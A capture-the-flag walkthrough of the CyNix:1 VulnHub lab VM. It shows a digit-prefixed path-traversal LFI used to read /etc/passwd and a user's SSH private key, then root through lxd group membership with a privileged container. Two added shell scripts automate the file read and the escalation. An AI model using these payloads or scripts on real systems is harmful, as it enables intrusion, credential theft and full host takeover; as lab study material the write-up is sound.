vulnhub-walkthrough[CyNix-1]

note

To help myself grow and keep up with international trends, starting with this article all of my technical articles, walkthroughs, writeups and other odds and ends will be written entirely in English. Important things are said three times: all in English! All in English! All in English! In the future, to keep up with international trends, articles may occasionally switch to other countries' languages!!!

name

Name: CyNix: 1
Date release: 18 Nov 2019

download

Download: https://drive.google.com/open?id=1oV8J4o3R8WP25fnIMy0ZKdZi-97eNP6b
Download (Mirror): https://download.vulnhub.com/cynix/CyNix.ova
Download (Torrent): https://download.vulnhub.com/cynix/CyNix.ova.torrent

description

  • Level: Intermediate-Hard
  • User flag: user.txt
  • Root flag: root.txt
  • Description: It’s a Boot2Root machine. The machine is VirtualBox compatible but can be used in VMWare as well (not tested but it should work). The DHCP will assign an IP automatically. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively. Enjoy pwning it!

We recommend that you use VirtualBox and not VMware for this VM

information gathering

First, run a ping sweep with nmap to find the target:

nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.125
Host is up (0.00016s latency).
MAC Address: 08:00:27:FC:8E:E4 (Oracle VirtualBox virtual NIC)

Then run a full port scan with version detection and default scripts against the host:

nmap -sV -sC -T4 -v -p- 192.168.56.125
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6688/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:df:0d:37:b1:3c:86:0e:e6:6f:84:b9:28:11:ee:68 (RSA)
| 256 8f:3e:c0:08:03:13:e8:64:89:f6:f9:63:b3:88:99:2a (ECDSA)
|_ 256 fb:e3:40:e6:91:0b:3c:bc:b7:0e:c7:bd:ef:a2:93:fc (ED25519)
MAC Address: 08:00:27:FC:8E:E4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
enumeration

I used dirbuster for web directory scanning and got the following results:

/icons    403
/lavalamp 200
/server-status 403

In the /lavalamp/ application I tried the contact page and captured the following request with Burp:

POST /lavalamp/canyoubypassme.php HTTP/1.1
Host: 192.168.56.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.56.125
Connection: close
Referer: http://192.168.56.125/lavalamp/

name=test&email=ccasdcasdcas%40qq.com&subject=fuckyou&message=wocaonimacasdcasdcasd

Then browse to the endpoint the form posts to directly:

http://192.168.56.125/lavalamp/canyoubypassme.php

and check the page source:

<table width="40%" cellspacing="0" cellpadding="0" margin="20%" class="tb1" style="margin:2% 30%;opacity: 0.0;">
<tr><td align=center style="padding: 3%;">
<form method=post action="/lavalamp/canyoubypassme.php">Specify a number: <input type=text name=file placeholder=integer><br><br><input type=submit name=read value="Download the number"></form>

The table is styled with opacity: 0.0, so the form is on the page but invisible. Change it to opacity: 1.0 in the browser's developer tools and see what happens.

That makes the form visible. Note that the opacity only hides the form visually; the endpoint accepts the POST regardless, so this is not access control. Submit the form and intercept the request with Burp:

POST /lavalamp/canyoubypassme.php HTTP/1.1
Host: 192.168.56.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.56.125
Connection: close
Referer: http://192.168.56.125/lavalamp/canyoubypassme.php
Upgrade-Insecure-Requests: 1

file=21212&read=Download+the+number

Edit the file parameter to trigger the LFI. The page wants an integer, and the leading 1 is enough to get past that check while the rest of the value is still used as a path, so the traversal walks out of the web root:

file=1../../../etc/passwd&read=Download+the+number

Response:

 </td></tr></table>
<div id="right"></div><div align=center><textarea rows=20 cols=60>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
ford:x:1000:1000:ford,,,:/home/ford:/bin/bash
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
</textarea>

ford is the only regular user in /etc/passwd with a login shell, so edit the payload again to read ford's SSH private key:

file=1../../../home/ford/.ssh/id_rsa&read=Download+the+number

and we get ford's private key (key material omitted here):

-----BEGIN RSA PRIVATE KEY-----
[private key body omitted]
-----END RSA PRIVATE KEY-----
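Added helper, not code from the original writeup: a small POSIX shell wrapper for the two reads above that builds the digit-prefixed traversal body, POSTs it with curl and pulls the file contents back out of the <textarea> the page wraps them in. The target URL, the parameter names and the ../ depth are taken from the captured requests; TARGET as an environment variable, the function names and the sample HTML used for the offline demo are my additions, and that sample is constructed rather than a real server response.

```shell
#!/bin/sh
# Added helper for the canyoubypassme.php LFI (example code, not from the
# original writeup). TARGET and the ../ depth are assumptions based on the
# captured requests in the walkthrough.

TARGET="${TARGET:-http://192.168.56.125}"

# Build the POST body for an absolute path. The page expects a number, so
# the traversal is prefixed with a digit; the rest is used as the path.
lfi_body() {
    path="${1#/}"   # drop the leading slash, the traversal supplies it
    printf 'file=1../../../%s&read=Download+the+number' "$path"
}

# Extract the file contents from the <textarea> the page wraps them in.
# Reads HTML on stdin, prints only the textarea body. Handles the case
# where the opening and closing tags sit on the same line.
extract_textarea() {
    awk '
        /<textarea[^>]*>/ { inside = 1; sub(/^.*<textarea[^>]*>/, "") }
        inside && /<\/textarea>/ { sub(/<\/textarea>.*$/, ""); if (length($0)) print; exit }
        inside { print }
    '
}

# Read one file through the LFI (needs network access to TARGET).
lfi_read() {
    curl -s "$TARGET/lavalamp/canyoubypassme.php" \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        --data "$(lfi_body "$1")" | extract_textarea
}

# Constructed sample response (shape copied from the /etc/passwd dump in the
# walkthrough) so the parser can be exercised offline without the VM.
SAMPLE_HTML='</td></tr></table>
<div id="right"></div><div align=center><textarea rows=20 cols=60>root:x:0:0:root:/root:/bin/bash
ford:x:1000:1000:ford,,,:/home/ford:/bin/bash
</textarea>
</div>'

# Runs the parser over the constructed sample; used by the offline demo.
sample_passwd() {
    printf '%s\n' "$SAMPLE_HTML" | extract_textarea
}

# Live usage:  . ./lfi.sh; lfi_read /home/ford/.ssh/id_rsa > key; chmod 600 key
sample_passwd
```

Source the file and call lfi_read with the absolute path you want; the parser is written so that a file short enough for the opening and closing textarea tags to land on one line still comes out cleanly. The key comes back exactly as the textarea holds it, so check that the BEGIN and END lines are intact before handing it to ssh -i.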

Save the key locally, restrict its permissions (ssh refuses a private key that other users can read) and log in as ford. SSH is not on port 22 here; nmap found it on 6688:

root@kali:~/vulnhub/cynix# mousepad key
root@kali:~/vulnhub/cynix# chmod 700 key
root@kali:~/vulnhub/cynix# ssh -i key ford@192.168.56.125
ssh: connect to host 192.168.56.125 port 22: Connection refused
root@kali:~/vulnhub/cynix# ssh -i key ford@192.168.56.125 -p 6688
The authenticity of host '[192.168.56.125]:6688 ([192.168.56.125]:6688)' can't be established.
ECDSA key fingerprint is SHA256:4l9whYX6vUaC+OGLPBYRWd7sw10HKH1wJU+FcVVeJyQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.125]:6688' (ECDSA) to the list of known hosts.
_____ _ _ ____ ______ _ _ _______ __
| __ \| | | |/ __ \| ____| \ | |_ _\ \ / /
| |__) | |__| | | | | |__ | \| | | | \ V /
| ___/| __ | | | | __| | . ` | | | > <
| | | | | | |__| | |____| |\ |_| |_ / . \
|_| |_| |_|\____/|______|_| \_|_____/_/ \_\


Last login: Fri Nov 8 16:46:44 2019 from 10.80.3.41
ford@blume:~$ id
uid=1000(ford) gid=1000(ford) groups=1000(ford),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),113(lxd)
ford@blume:~$ whoami
ford
ford@blume:~$ ls
user.txt
ford@blume:~$ cat user.txt
02d6267ed96e6b615b031dafe9607151

lxd privilege escalation

The id output above shows ford is in the lxd group. Membership in that group lets an unprivileged user create privileged containers and mount host disks into them, which is effectively root on the host. The steps below follow this article:

  • lxd privilege escalation

On the attacking machine, build a minimal Alpine image for LXD with the following commands:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Transfer alpine-v3.11-x86_64-20200119_0151.tar.gz to the victim. Serve it over HTTP from Kali (192.168.56.126) and fetch it with wget on the target:

root@kali:~/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.56.125 - - [21/May/2020 00:51:58] "GET /alpine-v3.11-x86_64-20200119_0151.tar.gz HTTP/1.1" 200 -
ford@blume:/tmp$ wget http://192.168.56.126/alpine-v3.11-x86_64-20200119_0151.tar.gz
--2020-05-21 10:21:57-- http://192.168.56.126/alpine-v3.11-x86_64-20200119_0151.tar.gz
Connecting to 192.168.56.126:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3226602 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.11-x86_64-20200119_0151.tar.gz’

alpine-v3.11-x86_64-20200 100%[==================================>] 3.08M --.-KB/s in 0.06s

2020-05-21 10:21:57 (50.3 MB/s) - ‘alpine-v3.11-x86_64-20200119_0151.tar.gz’ saved [3226602/3226602]

Then import it as an LXD image:

ford@blume:/tmp$ lxc image import ./alpine-v3.11-x86_64-20200119_0151.tar.gz --alias myimage
Image imported with fingerprint: 468c747448ec99c6b76e5a943df89a21489eb5d605ebe5d4c341a78ec217a223

Use lxc image list to confirm the image is there. Then create a container from it with security.privileged=true, add a disk device that mounts the host's / at /mnt/root inside the container, start it, and exec a shell. Because the container is privileged, root inside it is real root on the host:

ford@blume:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | 468c747448ec | no | alpine v3.11 (20200119_01:51) | x86_64 | 3.08MB | May 21, 2020 at 5:39am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
ford@blume:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
ford@blume:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
ford@blume:/tmp$ lxc start ignite
ford@blume:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root

Once inside the container, the host's entire filesystem is available under /mnt/root, with read and write access as root. That is enough to read root.txt; it would equally allow writing to the host, for example to /root/.ssh/authorized_keys, for a persistent root shell.

Finally, read root.txt:

~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt
Oh Yeah! Finally Pwned!

Here's your root flag:
b0f971eddce7bd007e9f50ca02f5fe11
____ __ __ _ __ ______
/ _/ / /____ _ __ ___ / / | |/ // ____/
/ / / // __ \| | / // _ \ / / | // /
_/ / / // /_/ /| |/ // __/ / /___ / |/ /___
/___/ /_/ \____/ |___/ \___/ /_____//_/|_|\____/

https://www.linkedin.com/in/sumit-verma-125576129/
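The escalation above as a script with the preflight checks a practitioner wants before running it. This is an added example, not the author's or the reference article's code; the default image path, the ALIAS/CONTAINER/DEVICE names and the final chroot into the mounted host root (where the walkthrough simply runs /bin/sh) are my choices.

```shell
#!/bin/sh
# Added example, not from the original writeup: the lxd escalation above as a
# script with preflight checks and cleanup. IMAGE default, ALIAS, CONTAINER
# and DEVICE are assumptions; the chroot at the end is an addition to the
# plain "lxc exec ... /bin/sh" used in the walkthrough.
set -u

IMAGE="${IMAGE:-/tmp/alpine-v3.11-x86_64-20200119_0151.tar.gz}"
ALIAS="myimage"
CONTAINER="ignite"
DEVICE="hostroot"

# Is $1 in the group list given as the remaining arguments (the output of
# "id -nG")? Pure function so it can be checked on constructed input.
in_group() {
    want="$1"; shift
    for g in "$@"; do
        [ "$g" = "$want" ] && return 0
    done
    return 1
}

# Everything that must be true before the escalation can work. Membership
# in the lxd group is the whole vulnerability: it lets an unprivileged user
# create a privileged container and bind-mount the host's disk into it.
lxd_preflight() {
    # shellcheck disable=SC2046
    in_group lxd $(id -nG) || { echo "preflight: not in the lxd group" >&2; return 1; }
    command -v lxc >/dev/null 2>&1 || { echo "preflight: lxc client not found" >&2; return 1; }
    [ -r "$IMAGE" ] || { echo "preflight: image $IMAGE not readable" >&2; return 1; }
}

lxd_privesc() {
    lxd_preflight || return 1
    # Import only once so the script can be re-run after a failed attempt.
    lxc image info "$ALIAS" >/dev/null 2>&1 || lxc image import "$IMAGE" --alias "$ALIAS"
    # security.privileged=true: uid 0 in the container is uid 0 on the host,
    # so the mounted host filesystem is read/write as real root.
    lxc init "$ALIAS" "$CONTAINER" -c security.privileged=true
    lxc config device add "$CONTAINER" "$DEVICE" disk source=/ path=/mnt/root recursive=true
    lxc start "$CONTAINER"
    # chroot into the host's root so the shell sees the host's own binaries,
    # /root/root.txt and so on at their real paths.
    lxc exec "$CONTAINER" -- chroot /mnt/root /bin/bash
}

# Remove the container and image once done.
lxd_cleanup() {
    lxc stop "$CONTAINER" --force 2>/dev/null
    lxc delete "$CONTAINER" 2>/dev/null
    lxc image delete "$ALIAS" 2>/dev/null
}

# Run only when explicitly asked, so sourcing the file for its functions
# (or running it on a box without lxd) does nothing.
case "${1:-}" in
    pwn) lxd_privesc ;;
    clean) lxd_cleanup ;;
esac
```

Run it as sh lxd_pwn.sh pwn on the target after fetching the image to /tmp (set IMAGE to override the path), and sh lxd_pwn.sh clean to remove the container and image afterwards. The in_group check is the important one: if id -nG does not list lxd, nothing else in the script can work, and it is also the check a defender should run on their own hosts, since any user in that group is one script away from root.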

Summary of knowledge

  • change opacity: 0.0 to 1.0 in the page source to reveal the hidden form
  • use the LFI (digit-prefixed path traversal) to read /etc/passwd and ford's SSH private key
  • lxd group membership gives root via a privileged container with the host's disk mounted

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lucifer11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…